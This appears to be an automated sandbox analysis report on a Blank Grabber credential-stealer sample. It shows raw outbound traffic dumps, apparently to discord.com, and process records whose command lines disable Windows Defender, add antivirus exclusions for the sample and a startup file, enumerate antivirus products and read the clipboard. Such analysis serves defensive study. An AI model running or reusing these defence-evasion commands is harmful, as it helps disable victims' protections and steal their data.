                                                                                                                                                                                                                                            2024-11-17 10:22:42 UTC16384OUTData Raw: 44 fb d2 5e 5b 97 72 32 34 55 8a 99 fc 23 5c 8e ec 81 ad 6b 5f d6 30 0a 06 4f b4 d2 d9 2d b4 cb 9e 93 47 af 6c 31 42 42 5e 7f 1b 5e c0 b1 0c 5a c8 2b 3c 80 70 ff 5d c6 df ae ba fa 0b 75 09 80 00 96 16 ac 86 6c a5 8b 58 3a b6 c7 a9 89 1f 3e 60 52 9d 7b 04 96 c7 08 58 82 27 61 9a c4 0b bf 6d 01 45 32 33 e0 13 95 13 a8 82 4f 19 e6 4a 40 74 90 8e 09 60 66 29 2c 29 fa a9 16 fb 3d 3e 64 cf 37 20 5a 5c c0 a7 c4 29 7f b6 5e e3 1c 19 69 05 5e b2 88 bd cb b2 d8 f5 2d 2b 02 ce d7 0b d1 8b 2a b3 8c ba 8e 77 90 51 46 d0 2d c1 0e 66 cc 30 34 fb 42 ab 9a ef 5e 99 65 1e 3d ff 71 3c 0a f1 53 fd 3e c6 38 f5 61 b1 7e 45 7d ae b5 66 ac 32 fb 1c bc 81 ac c5 db 34 70 ff cb e4 b6 20 e0 b9 cc 4d 2b 42 1f d6 87 0a 2a 66 73 05 bf 9b 02 c7 c6 22 31 27 e7 73 73 8d e4 8b 18 6b 10 06
                                                                                                                                                                                                                                            Data Ascii: D^[r24U#\k_0O-Gl1BB^^Z+<p]ulX:>`R{X'amE23OJ@t`f),)=>d7 Z\)^i^-+*wQF-f04B^e=q<S>8a~E}f24p M+B*fs"1'ssk
                                                                                                                                                                                                                                            2024-11-17 10:22:42 UTC16384OUTData Raw: ca 87 1b b4 b9 43 16 c2 1f cd e3 aa c2 3f 10 28 07 1f c7 42 1a 27 d0 aa d9 f6 af 42 4b dd be 8d 4e d4 52 bc 3c 06 7a 35 d9 9d c2 84 3f 23 dc 8a 5f 4f b9 d5 26 0d 09 98 a9 fe 7d 6b 20 12 e6 b2 52 33 c5 d9 18 ea 0f ad 2c dd 6a 90 7f 2c f6 5c fd 5c 3d 86 a1 90 5d e8 6b ee 6f be 8c 8d db df 40 0f f9 c7 54 e8 98 30 11 da 2b f2 46 42 10 d8 06 b9 9f 5b f2 9d 53 7a d6 2d c6 2d 8c 21 8d e4 f7 90 fd 81 85 ad 67 8a b4 c9 30 fb 63 ed 05 a6 0e 46 2e 7e d3 c8 46 f3 63 ce 67 86 67 8e 6d d6 35 3b 9f 78 f8 90 fb d6 92 53 77 e7 9f 90 ba 41 9d 39 22 75 e5 bf d7 ec 10 c5 74 9d 27 75 83 4a c8 38 c6 03 db 24 87 f1 55 c2 ed 0b 9f 36 cf b5 5c ea b1 c8 ef 56 64 c1 bc 88 0c fc ce 9d 7f 48 0d e9 f3 33 30 09 e8 f1 38 64 36 99 de 73 97 9c 57 e9 54 5b 62 37 8e 3f 3f 70 49 0f f5 28 12
                                                                                                                                                                                                                                            Data Ascii: C?(B'BKNR<z5?#_O&}k R3,j,\\=]ko@T0+FB[Sz--!g0cF.~Fcggm5;xSwA9"ut'uJ8$U6\VdH308d6sWT[b7??pI(
                                                                                                                                                                                                                                            2024-11-17 10:22:42 UTC16384OUTData Raw: e9 f0 a2 d9 80 df 0c 81 76 6e c1 79 65 70 65 d1 3b 75 ee 51 76 cb 3e 5f d5 26 00 06 c1 1d 26 42 4c 67 16 76 4b f6 5b d4 51 f9 0c d2 40 ce 03 29 29 53 86 5c 9d e4 d2 c5 93 7e a3 d2 91 93 fb e8 bb 02 c7 5e 8b b1 08 1a dd 08 56 70 62 7c 6b b0 f2 6d df a5 f5 e1 c7 cb fc ac 8f a4 55 56 3e ff a8 7a be 88 eb 59 99 8c 58 69 a4 b1 cd bc dc 6a 56 9a 3b f2 c8 14 e9 18 8f d4 8f 90 02 85 de c7 d1 5f 43 19 45 b0 65 89 16 7b 1a cf 16 a6 ed e2 01 c2 4e ad d4 c3 eb 06 83 ea 6f 44 88 0c 35 f8 88 42 dd 64 67 c6 d1 70 16 ff 83 94 7f ae d4 54 1d 90 61 4c a2 22 27 72 9a 5b d3 dd 11 66 48 00 92 bd 2e 1f 5b 7c 6b e0 30 81 6d 58 96 77 2f 0f f1 56 84 4b d4 4e 8b 7d 0e 9e 9b fa 8f d1 63 51 43 c8 3a 5e 75 21 b1 38 d6 bb 14 2f 0b e1 ad 65 e3 16 d0 59 91 8d 7c fa b7 de 9b bd 98 c9 72
                                                                                                                                                                                                                                            Data Ascii: vnyepe;uQv>_&&BLgvK[Q@))S\~^Vpb|kmUV>zYXijV;_CEe{NoD5BdgpTaL"'r[fH.[|k0mXw/VKN}cQC:^u!8/eY|r
                                                                                                                                                                                                                                            2024-11-17 10:22:42 UTC16384OUTData Raw: d5 d3 9b b4 30 0d b2 76 8d bb fd ae e0 85 ae 9b c6 15 1b 5d bf 9f a9 8f e0 57 9f 20 62 2f 89 76 0e 2c a8 d2 95 db 9e dd cf a9 c7 0c b2 87 7c f2 e1 fc 3d de 06 c9 a4 26 22 72 ba f9 b7 7c 37 8b 0e 2a a7 52 f1 39 25 56 88 8c 55 c6 9a 3d 5a 5d 92 11 49 37 7a 0c 0e 4b e6 d6 c8 c3 be ba d9 d0 cb a9 8b b8 4f af e8 fe 6c c5 e0 e4 cd 9a 45 d8 c1 d3 f8 1a b5 f2 f6 ab d3 77 d5 1c 53 d3 f2 b0 fa b4 e3 92 2f 03 34 db 0e 49 ed d5 40 09 70 67 31 5e 4b cc 31 26 3d 59 8c 9a ef 1b 0f b8 a0 c5 79 85 0f 07 a0 5c 84 57 a4 30 43 d3 6d ee 0d 68 ab 33 17 ec de 7a 19 96 1c e5 a3 dd 75 27 7e 08 42 5d 9c bc 79 b9 c2 4b 9b fe df 51 c3 69 c1 32 06 73 66 3f a2 87 b6 ff 32 c6 c4 b3 ff 1d 02 c6 d9 2d c4 6a 60 2c 06 7b e1 f6 7a c7 5c 54 fb 14 13 76 d4 ce 80 b2 09 65 28 6d b5 e1 b8 2a ff
                                                                                                                                                                                                                                            Data Ascii: 0v]W b/v,|=&"r|7*R9%VU=Z]I7zKOlEwS/4I@pg1^K1&=Yy\W0Cmh3zu'~B]yKQi2sf?2-j`,{z\Tve(m*
                                                                                                                                                                                                                                            2024-11-17 10:22:43 UTC1253INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Sun, 17 Nov 2024 10:22:43 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731838964
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kw%2FMCC3nxYl1Sb3abNC0WpO%2FFrUHsOgYiaVPTDATc2ZXBunk234OqISsKrlIBESZZz3Fw35sEraQjNMdFhDGCmXh9SjSXz4cgxjnZha1bFkdj228QxWzxWkoww2m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Set-Cookie: __cfruid=7f3eb00f74a25652e1281dc04aa6cdbfe83e4455-1731838963; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Set-Cookie: _cfuvid=ffpl7Z_XRbw2jJzUSb94O3lzwZOtlB08ocIN8D03Ggs-1731838963322-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e3f004c2e334678-DFW


                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:05:22:02
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\program.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6b7500000
                                                                                                                                                                                                                                            File size:7'954'796 bytes
                                                                                                                                                                                                                                            MD5 hash:3E6865657B29FAEA3A355C710F0AAD45
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1707785964.000002641A645000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1707785964.000002641A643000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:05:22:02
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\program.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6b7500000
                                                                                                                                                                                                                                            File size:7'954'796 bytes
                                                                                                                                                                                                                                            MD5 hash:3E6865657B29FAEA3A355C710F0AAD45
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2102475831.000001B5FEEF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                            Start time:05:22:04
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:05:22:04
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                            Start time:05:22:04
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                            Start time:05:22:04
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                            Start time:05:22:05
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                            Start time:05:22:05
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                            Start time:05:22:05
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                            Start time:05:22:05
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                            Start time:05:22:05
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                            Start time:05:22:06
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                            Start time:05:22:06
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                            Start time:05:22:06
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                            Start time:05:22:06
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                            Imagebase:0x7ff77aff0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                            Imagebase:0x7ff77aff0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                            Imagebase:0x7ff71fde0000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:22
